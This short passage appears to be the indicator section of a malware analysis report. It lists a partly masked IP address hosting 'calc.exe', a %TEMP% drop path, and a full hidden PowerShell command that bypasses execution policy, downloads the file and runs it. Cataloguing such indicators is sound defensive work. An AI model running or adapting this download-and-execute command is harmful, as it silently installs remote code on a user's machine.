Technical Information
- '%TEMP%\calc.exe'
- http://93.##5.19.226/calc.exe as $d
- %TEMP%\calc.exe
- http://93.##5.19.226/
- http://93.##5.19.226/calc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden $d=$env:temp+'\calc.exe';(New-Object System.Net.WebClient).DownloadFile('http://93.##5.19.226/calc.exe',$d);Start-Process $d;' (with hidden window)